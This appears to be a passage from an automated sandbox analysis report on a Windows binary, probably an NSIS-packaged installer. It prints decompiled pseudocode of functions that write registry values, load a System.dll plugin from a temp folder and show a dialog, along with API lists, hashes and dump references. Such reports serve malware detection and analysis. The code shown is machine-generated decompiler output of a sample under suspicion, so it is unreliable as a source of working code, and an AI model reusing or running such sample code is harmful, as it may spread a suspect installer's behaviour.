                                                                                                                                                                          0x00404d72
                                                                                                                                                                          0x00404d73
                                                                                                                                                                          0x00404d75
                                                                                                                                                                          0x00404d77
                                                                                                                                                                          0x00404d79
                                                                                                                                                                          0x00404d7c
                                                                                                                                                                          0x00404d7c
                                                                                                                                                                          0x00404d83
                                                                                                                                                                          0x00404d89
                                                                                                                                                                          0x00404d89
                                                                                                                                                                          0x00404d90
                                                                                                                                                                          0x00404d97
                                                                                                                                                                          0x00404d9a
                                                                                                                                                                          0x00404d9d
                                                                                                                                                                          0x00404d9d
                                                                                                                                                                          0x00404da1
                                                                                                                                                                          0x00404db1
                                                                                                                                                                          0x00404db3
                                                                                                                                                                          0x00404db6
                                                                                                                                                                          0x00404d5f
                                                                                                                                                                          0x00404d5f
                                                                                                                                                                          0x00404d66
                                                                                                                                                                          0x00404d66
                                                                                                                                                                          0x00404dbe
                                                                                                                                                                          0x00404dc9
                                                                                                                                                                          0x00404ddf
                                                                                                                                                                          0x00404df0
                                                                                                                                                                          0x00404e0c

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                          • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                          • SetDlgItemTextW.USER32 ref: 00404E03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                          • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                          • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                          • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                          • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040248A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                          			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}












                                                                                                                                                                          0x0040248a
                                                                                                                                                                          0x0040248a
                                                                                                                                                                          0x0040248a
                                                                                                                                                                          0x0040248a
                                                                                                                                                                          0x0040248d
                                                                                                                                                                          0x00402494
                                                                                                                                                                          0x0040249e
                                                                                                                                                                          0x004024a1
                                                                                                                                                                          0x004024aa
                                                                                                                                                                          0x004024b1
                                                                                                                                                                          0x004024b8
                                                                                                                                                                          0x004024bb
                                                                                                                                                                          0x004024c1
                                                                                                                                                                          0x004024cb
                                                                                                                                                                          0x004024cf
                                                                                                                                                                          0x004024da
                                                                                                                                                                          0x004024da
                                                                                                                                                                          0x004024e1
                                                                                                                                                                          0x004024eb
                                                                                                                                                                          0x004024f1
                                                                                                                                                                          0x004024f4
                                                                                                                                                                          0x004024f4
                                                                                                                                                                          0x004024f8
                                                                                                                                                                          0x00402504
                                                                                                                                                                          0x00402504
                                                                                                                                                                          0x0040251d
                                                                                                                                                                          0x0040251f
                                                                                                                                                                          0x0040251f
                                                                                                                                                                          0x00402522
                                                                                                                                                                          0x004025fd
                                                                                                                                                                          0x004025fd
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nszAAC8.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszAAC8.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszAAC8.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp
                                                                                                                                                                          • API String ID: 2655323295-3119500820
                                                                                                                                                                          • Opcode ID: 882b5123b3f2780d9b37219f39fcfb1a6100ed544d0da4570df39595edc1a640
                                                                                                                                                                          • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                                                                          • Opcode Fuzzy Hash: 882b5123b3f2780d9b37219f39fcfb1a6100ed544d0da4570df39595edc1a640
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405E0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                          			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                                                                                                          0x00405e0d
                                                                                                                                                                          0x00405e1a
                                                                                                                                                                          0x00405e1b
                                                                                                                                                                          0x00405e26
                                                                                                                                                                          0x00405e2e
                                                                                                                                                                          0x00405e2e
                                                                                                                                                                          0x00405e36

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                          • API String ID: 2659869361-3916508600
                                                                                                                                                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                          • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                          • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E410E1, Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E72E410E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x72e4506c = _a8;
				 *0x72e45070 = _a16;
				 *0x72e45074 = _a12;
				_a12( *0x72e45048, E72E41651, _t73);
				_t66 =  *0x72e4506c +  *0x72e4506c * 4 << 3;
				_t27 = E72E412E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x72e45040;
							if( *0x72e45040 == 0) {
								goto L26;
							}
							E72E41603( *0x72e45074, _t31 + 4, _t66);
							_t34 =  *0x72e45040;
							_t86 = _t86 + 0xc;
							 *0x72e45040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E72E41312(E72E4135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E72E41381(_t80, E72E412E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E72E41603(_t10,  *0x72e45074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x72e45040;
							 *0x72e45040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x72e45070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E72E41603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x72e4506c +  *0x72e4506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E72E41603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x72e45070);
						 *( *0x72e45070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                                                                                                          0x72e410eb
                                                                                                                                                                          0x72e41100
                                                                                                                                                                          0x72e41109
                                                                                                                                                                          0x72e4110e
                                                                                                                                                                          0x72e41119
                                                                                                                                                                          0x72e4111c
                                                                                                                                                                          0x72e41125
                                                                                                                                                                          0x72e41129
                                                                                                                                                                          0x72e4112b
                                                                                                                                                                          0x72e412b0
                                                                                                                                                                          0x72e412ba
                                                                                                                                                                          0x72e412ba
                                                                                                                                                                          0x72e41132
                                                                                                                                                                          0x72e41132
                                                                                                                                                                          0x72e41137
                                                                                                                                                                          0x72e41138
                                                                                                                                                                          0x72e4113a
                                                                                                                                                                          0x72e4113d
                                                                                                                                                                          0x72e41256
                                                                                                                                                                          0x72e41259
                                                                                                                                                                          0x72e41271
                                                                                                                                                                          0x72e41271
                                                                                                                                                                          0x72e41278
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41285
                                                                                                                                                                          0x72e4128a
                                                                                                                                                                          0x72e4128f
                                                                                                                                                                          0x72e41294
                                                                                                                                                                          0x72e4129a
                                                                                                                                                                          0x72e4129b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4129b
                                                                                                                                                                          0x72e4125b
                                                                                                                                                                          0x72e4125e
                                                                                                                                                                          0x72e411bc
                                                                                                                                                                          0x72e411bf
                                                                                                                                                                          0x72e411c2
                                                                                                                                                                          0x72e411cb
                                                                                                                                                                          0x72e411d0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e411d1
                                                                                                                                                                          0x72e41264
                                                                                                                                                                          0x72e41266
                                                                                                                                                                          0x72e411a2
                                                                                                                                                                          0x72e411a5
                                                                                                                                                                          0x72e411a8
                                                                                                                                                                          0x72e411b1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e411b1
                                                                                                                                                                          0x72e41164
                                                                                                                                                                          0x72e41165
                                                                                                                                                                          0x72e41177
                                                                                                                                                                          0x72e41180
                                                                                                                                                                          0x72e41184
                                                                                                                                                                          0x72e4118e
                                                                                                                                                                          0x72e41191
                                                                                                                                                                          0x72e41193
                                                                                                                                                                          0x72e41193
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41165
                                                                                                                                                                          0x72e41143
                                                                                                                                                                          0x72e41218
                                                                                                                                                                          0x72e4121d
                                                                                                                                                                          0x72e41221
                                                                                                                                                                          0x72e41223
                                                                                                                                                                          0x72e4122c
                                                                                                                                                                          0x72e4122f
                                                                                                                                                                          0x72e41238
                                                                                                                                                                          0x72e4123d
                                                                                                                                                                          0x72e4123d
                                                                                                                                                                          0x72e41247
                                                                                                                                                                          0x72e4124a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41250
                                                                                                                                                                          0x72e41149
                                                                                                                                                                          0x72e4114c
                                                                                                                                                                          0x72e411e9
                                                                                                                                                                          0x72e411ed
                                                                                                                                                                          0x72e411f7
                                                                                                                                                                          0x72e411fb
                                                                                                                                                                          0x72e41205
                                                                                                                                                                          0x72e4120a
                                                                                                                                                                          0x72e41211
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41211
                                                                                                                                                                          0x72e41152
                                                                                                                                                                          0x72e41155
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4115b
                                                                                                                                                                          0x72e4115e
                                                                                                                                                                          0x72e411b8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e411b8
                                                                                                                                                                          0x72e41160
                                                                                                                                                                          0x72e41162
                                                                                                                                                                          0x72e4119e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4119e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e412a1
                                                                                                                                                                          0x72e412a1
                                                                                                                                                                          0x72e412ab
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                          • Opcode ID: a0bdbd597b26432d85245480835653e4c106ae15d35f1487cdfd6636aff4e9dd
                                                                                                                                                                          • Instruction ID: 23b2573e10c4b9c9d5f5ba93ec7a84ba25f30e31fc0c15d392cff3238b7398b6
                                                                                                                                                                          • Opcode Fuzzy Hash: a0bdbd597b26432d85245480835653e4c106ae15d35f1487cdfd6636aff4e9dd
                                                                                                                                                                          • Instruction Fuzzy Hash: DF516D7A540201DFDB01CF6DE944B297BE8EB15319B60A91DFD4ADF210EB30E951CB64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040263E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                          			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp", "C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                                                                                                          0x0040263e
                                                                                                                                                                          0x0040263e
                                                                                                                                                                          0x0040263e
                                                                                                                                                                          0x00402643
                                                                                                                                                                          0x00402646
                                                                                                                                                                          0x00402649
                                                                                                                                                                          0x0040264e
                                                                                                                                                                          0x00402650
                                                                                                                                                                          0x00402670
                                                                                                                                                                          0x004026aa
                                                                                                                                                                          0x00402672
                                                                                                                                                                          0x00402674
                                                                                                                                                                          0x00402688
                                                                                                                                                                          0x00402695
                                                                                                                                                                          0x00402695
                                                                                                                                                                          0x00402652
                                                                                                                                                                          0x00402654
                                                                                                                                                                          0x00402659
                                                                                                                                                                          0x00402667
                                                                                                                                                                          0x0040266a
                                                                                                                                                                          0x004026af
                                                                                                                                                                          0x004026b2
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x004026b8
                                                                                                                                                                          0x004026c1
                                                                                                                                                                          0x004026c3
                                                                                                                                                                          0x004026e2
                                                                                                                                                                          0x004015b4
                                                                                                                                                                          0x004015b6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004015bc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004026c3
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll), ref: 00402695
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp$C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll
                                                                                                                                                                          • API String ID: 1659193697-635422215
                                                                                                                                                                          • Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                                                                                                                                          • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403019, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                                                                                                                                                                          0x00403020
                                                                                                                                                                          0x00403040
                                                                                                                                                                          0x0040304a
                                                                                                                                                                          0x00403056
                                                                                                                                                                          0x00403067
                                                                                                                                                                          0x00403070
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403075
                                                                                                                                                                          0x0040307c
                                                                                                                                                                          0x00403042
                                                                                                                                                                          0x00403049
                                                                                                                                                                          0x00403049
                                                                                                                                                                          0x00403022
                                                                                                                                                                          0x00403022
                                                                                                                                                                          0x00403029
                                                                                                                                                                          0x0040302c
                                                                                                                                                                          0x0040302c
                                                                                                                                                                          0x00403032
                                                                                                                                                                          0x00403039
                                                                                                                                                                          0x00403039

                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 00403067
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                          • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                          • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                          • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                          • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405F14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
